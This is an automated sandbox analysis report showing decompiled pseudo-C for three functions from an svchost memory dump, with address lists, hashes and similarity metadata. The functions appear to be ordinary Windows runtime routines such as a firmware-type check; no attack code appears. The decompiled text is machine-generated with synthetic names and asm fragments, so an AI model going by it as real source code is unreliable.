                        0x00000000
                        0x00000000
                        0x030ee741
                        0x030ee741
                        0x00000000
                        0x030ee741
                        0x030ee739
                        0x00000000
                        0x00000000
                        0x030ee73b
                        0x00000000
                        0x030ee73b
                        0x030ee722
                        0x030ee720
                        0x030ee6b0
                        0x030ee618
                        0x00000000
                        0x030ee618

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: `$`
                        • API String ID: 0-197956300
                        • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                        • Instruction ID: 855e9b92b2d68d9dec73ad9228e65dc28bfbc0218e508f6a3f5977596fb2ad07
                        • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                        • Instruction Fuzzy Hash: EB91BF313053459FE764CE25C940B5BB7E6AFC8714F18892DF9A9CB290E770E904CB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030A51BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                        Download Yara Rule
                        C-Code - Quality: 77%
                        			E030A51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x31005f0);
				E0307D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0303EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E030A53CA(0);
						return E0307D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0306F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E03043690(1, _t117, 0x3001810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0306AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L03044620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0306AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E030A500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E03069860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                        0x030a51be
                        0x030a51c3
                        0x030a51c8
                        0x030a51cd
                        0x030a51d0
                        0x030a51d3
                        0x030a51d8
                        0x030a51db
                        0x030a51de
                        0x030a51e0
                        0x030a51e3
                        0x030a51e6
                        0x030a51e8
                        0x030a5342
                        0x030a5351
                        0x030a5356
                        0x030a535a
                        0x030a5360
                        0x030a5363
                        0x030a5366
                        0x030a5369
                        0x030a5369
                        0x030a536b
                        0x030a536b
                        0x030a5370
                        0x030a53a3
                        0x030a53a4
                        0x030a53a6
                        0x030a53ab
                        0x030a53ab
                        0x030a53ae
                        0x030a53ae
                        0x030a53b5
                        0x030a53bf
                        0x030a53bf
                        0x030a5375
                        0x030a5396
                        0x030a53a0
                        0x030a53a0
                        0x00000000
                        0x030a5396
                        0x030a5377
                        0x030a5379
                        0x030a537f
                        0x030a538c
                        0x030a5390
                        0x00000000
                        0x030a5390
                        0x030a51ee
                        0x030a51f1
                        0x030a5301
                        0x030a5310
                        0x030a5315
                        0x030a5318
                        0x030a531b
                        0x030a5320
                        0x030a532e
                        0x030a5331
                        0x00000000
                        0x030a5331
                        0x030a5328
                        0x030a5329
                        0x00000000
                        0x030a5329
                        0x030a51fa
                        0x030a5235
                        0x030a5236
                        0x030a5239
                        0x030a523f
                        0x030a5240
                        0x030a5241
                        0x030a5242
                        0x030a5246
                        0x030a5247
                        0x030a524e
                        0x030a5251
                        0x030a5267
                        0x030a5269
                        0x030a526e
                        0x030a527d
                        0x030a527e
                        0x030a5281
                        0x030a5282
                        0x030a5287
                        0x030a5288
                        0x030a528a
                        0x030a528f
                        0x030a5294
                        0x00000000
                        0x00000000
                        0x030a529a
                        0x030a529c
                        0x030a529e
                        0x030a529e
                        0x030a52a4
                        0x030a52b0
                        0x00000000
                        0x00000000
                        0x030a52ba
                        0x030a52bc
                        0x030a52bc
                        0x030a52d4
                        0x030a52d9
                        0x030a52dc
                        0x030a52e1
                        0x00000000
                        0x00000000
                        0x030a52e7
                        0x030a52f4
                        0x00000000
                        0x030a52f4
                        0x030a5270
                        0x00000000
                        0x030a5270
                        0x030a51fc
                        0x030a51fd
                        0x030a5202
                        0x030a5203
                        0x030a5205
                        0x030a520a
                        0x030a520f
                        0x00000000
                        0x00000000
                        0x030a521b
                        0x030a5226
                        0x030a522b
                        0x030a521d
                        0x030a521d
                        0x030a5222
                        0x030a5222
                        0x030a522d
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: Legacy$UEFI
                        • API String ID: 2994545307-634100481
                        • Opcode ID: bd8ffea0dab1e4b035066e8beb6d84962fabc44d05456e8ef6055e0e1b9f8f0f
                        • Instruction ID: a025988f6b437b8e8d43797c8a0c1603eeffd925536d584a500d1f9ec86928e4
                        • Opcode Fuzzy Hash: bd8ffea0dab1e4b035066e8beb6d84962fabc44d05456e8ef6055e0e1b9f8f0f
                        • Instruction Fuzzy Hash: F5516DB2A02B089FDB24DFA8DC40BAEB7F8BF89740F14446DE589EB251D6719901CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0304B944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                        Download Yara Rule
                        C-Code - Quality: 76%
                        			E0304B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x311d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E03047D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E030F8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E03069E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0306B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0306CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E03047D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E030F8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0306AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x3118628; // 0x0
								_v68 = _t77;
								_t78 =  *0x311862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x3118628; // 0x0
							_t116 =  *0x311862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                        0x0304b94c
                        0x0304b956
                        0x0304b95c
                        0x0304b95e
                        0x0304b964
                        0x0304b969
                        0x0304b96d
                        0x0304b96d
                        0x0304b970
                        0x0304b974
                        0x0304b97a
                        0x0304badf
                        0x0304badf
                        0x0304bae2
                        0x0304bae4
                        0x0304bae6
                        0x0304baf0
                        0x03092cb8
                        0x0304baf6
                        0x0304baf6
                        0x0304baf6
                        0x0304bafd
                        0x0304bb1f
                        0x0304bb1f
                        0x0304baff
                        0x0304bb00
                        0x0304bb00
                        0x0304bb03
                        0x0304bb03
                        0x0304bacb
                        0x0304bacf
                        0x0304bad0
                        0x0304bad1
                        0x0304badc
                        0x0304badc
                        0x0304b980
                        0x0304b980
                        0x0304b988
                        0x0304b98b
                        0x0304b98d
                        0x0304b990
                        0x0304b993
                        0x0304b999
                        0x0304b99b
                        0x0304b9a1
                        0x0304b9a5
                        0x0304b9aa
                        0x0304b9b0
                        0x0304b9bb
                        0x0304b9c0
                        0x0304b9c3
                        0x0304b9ca
                        0x0304b9cc
                        0x0304b9cf
                        0x0304b9d3
                        0x0304b9d7
                        0x0304ba94
                        0x0304ba94
                        0x0304ba98
                        0x0304baa3
                        0x03092ccb
                        0x0304baa9
                        0x0304baa9
                        0x0304baa9
                        0x0304bab1
                        0x03092cd5
                        0x03092cdd
                        0x03092cdd
                        0x0304babb
                        0x0304babc
                        0x0304bac2
                        0x0304bac3
                        0x0304bac3
                        0x0304bac6
                        0x00000000
                        0x0304b9dd
                        0x0304b9dd
                        0x0304b9e7
                        0x0304b9e7
                        0x0304b9ec
                        0x0304b9ec
                        0x0304b9f1
                        0x0304b9f5
                        0x0304b9fa
                        0x0304ba00
                        0x0304ba0c
                        0x0304ba10
                        0x0304ba10
                        0x0304ba12
                        0x0304ba18
                        0x00000000
                        0x00000000
                        0x0304bb26
                        0x0304bb26
                        0x0304ba1e
                        0x0304ba1e
                        0x0304ba23
                        0x0304ba25
                        0x0304ba2c
                        0x0304ba30
                        0x0304ba35
                        0x0304ba35
                        0x0304ba41
                        0x0304ba46
                        0x0304ba4c
                        0x0304ba50
                        0x0304ba54
                        0x0304ba6a
                        0x0304ba6e
                        0x0304ba70
                        0x0304ba74
                        0x0304ba78
                        0x0304ba7a
                        0x0304ba7c
                        0x0304ba8e
                        0x0304ba90
                        0x0304ba92
                        0x0304bb14
                        0x0304bb14
                        0x0304bb16
                        0x0304bb16
                        0x00000000
                        0x0304ba7c
                        0x0304bb0a
                        0x0304bb0d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0304bb0f

                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0304B9A5
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 885266447-0
                        • Opcode ID: a80b6f89bf3399b2406a15ea8775892bfee5f69eebb44a2ef1547bf2854fe98b
                        • Instruction ID: e35c4b5f45b4c0fe063d7dbe1752ac5270d090b53a0d88c5741e00d0204b9456
                        • Opcode Fuzzy Hash: a80b6f89bf3399b2406a15ea8775892bfee5f69eebb44a2ef1547bf2854fe98b
                        • Instruction Fuzzy Hash: EB5146B1A0A344CFC724DF29C08092AFBF9BB88600F188D6EE5D587354D771EA44CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0302B171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E0302B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x30ff7a8);
				E0307D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0307D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0306D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0306F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0307DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0306B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0306B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0306E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0306A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                        0x0302b171
                        0x0302b171
                        0x0302b171
                        0x0302b171
                        0x0302b171
                        0x0302b176
                        0x0302b17b
                        0x0302b180
                        0x0302b186
                        0x0302b18f
                        0x0302b198
                        0x0302b1a4
                        0x0302b1aa
                        0x03084802
                        0x03084802
                        0x03084805
                        0x0308480c
                        0x0308480e
                        0x0302b1d1
                        0x0302b1d3
                        0x0302b1de
                        0x0302b1de
                        0x03084817
                        0x0308481e
                        0x03084820
                        0x03084822
                        0x03084822
                        0x03084824
                        0x03084824
                        0x0308482a
                        0x00000000
                        0x00000000
                        0x03084835
                        0x0308483a
                        0x0308483d
                        0x0308483f
                        0x03084842
                        0x03084842
                        0x03084842
                        0x03084846
                        0x0308484c
                        0x0308484e
                        0x03084851
                        0x03084851
                        0x03084853
                        0x03084854
                        0x03084854
                        0x03084858
                        0x0308485a
                        0x0308485a
                        0x0308485d
                        0x0308485f
                        0x03084861
                        0x03084861
                        0x03084866
                        0x0308486b
                        0x0308486e
                        0x03084871
                        0x03084876
                        0x03084876
                        0x03084878
                        0x0308487b
                        0x03084884
                        0x03084884
                        0x00000000
                        0x0308487d
                        0x0308487d
                        0x03084882
                        0x03084889
                        0x03084889
                        0x0308488f
                        0x03084891
                        0x030848e0
                        0x030848e2
                        0x030848e4
                        0x030848e4
                        0x030848e7
                        0x030848e7
                        0x030848ed
                        0x030848f4
                        0x030848f6
                        0x03084951
                        0x03084951
                        0x03084953
                        0x03084953
                        0x03084956
                        0x03084956
                        0x03084958
                        0x03084959
                        0x03084959
                        0x0308495d
                        0x0308495d
                        0x0308495f
                        0x0308495f
                        0x03084965
                        0x03084969
                        0x030849ba
                        0x030849ba
                        0x030849c1
                        0x030849c5
                        0x030849cc
                        0x030849d4
                        0x030849d7
                        0x030849da
                        0x030849e4
                        0x030849e5
                        0x030849f3
                        0x03084a02
                        0x00000000
                        0x03084a02
                        0x03084972
                        0x03084974
                        0x00000000
                        0x00000000
                        0x03084976
                        0x03084979
                        0x03084982
                        0x03084983
                        0x03084984
                        0x0308498b
                        0x0308498d
                        0x03084991
                        0x03084993
                        0x03084999
                        0x0308499d
                        0x030849a2
                        0x030849a2
                        0x030849a2
                        0x03084999
                        0x030849ac
                        0x00000000
                        0x030849b3
                        0x030848f8
                        0x030848fe
                        0x00000000
                        0x00000000
                        0x00000000
                        0x030848fe
                        0x03084895
                        0x0308489c
                        0x030848ad
                        0x030848b2
                        0x030848b5
                        0x030848b7
                        0x030848ba
                        0x030848bc
                        0x030848c6
                        0x030848c6
                        0x030848cb
                        0x030848d1
                        0x030848d4
                        0x030848d8
                        0x030848d8
                        0x00000000
                        0x030848d8
                        0x030848be
                        0x030848c0
                        0x00000000
                        0x00000000
                        0x030848c2
                        0x00000000
                        0x00000000
                        0x00000000
                        0x030848c4
                        0x00000000
                        0x03084882
                        0x0308487b
                        0x03084904
                        0x03084906
                        0x00000000
                        0x00000000
                        0x03084908
                        0x0308490e
                        0x00000000
                        0x00000000
                        0x03084910
                        0x03084917
                        0x03084917
                        0x00000000
                        0x03084917
                        0x0302b1ba
                        0x030847f9
                        0x030847fc
                        0x00000000
                        0x00000000
                        0x00000000
                        0x030847fc
                        0x0302b1c0
                        0x0302b1c0
                        0x0302b1c3
                        0x0302b1cb
                        0x00000000
                        0x00000000
                        0x00000000

                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: _vswprintf_s
                        • String ID:
                        • API String ID: 677850445-0
                        • Opcode ID: ee894bcffb4bce44d2c99392b0ee9777164c9ba67bf256492e521aa5d3e72b57
                        • Instruction ID: 5693fa7f19c3d50f514d6a649ba2829b98d0450e67632d2e0003d740c07c3c7b
                        • Opcode Fuzzy Hash: ee894bcffb4bce44d2c99392b0ee9777164c9ba67bf256492e521aa5d3e72b57
                        • Instruction Fuzzy Hash: 64510F75D0626ACFDB31EF69C840BAEBBF0BF40310F1845A9D899AB281D73049468B90
                        Uniqueness

                        Uniqueness Score: -1.00%

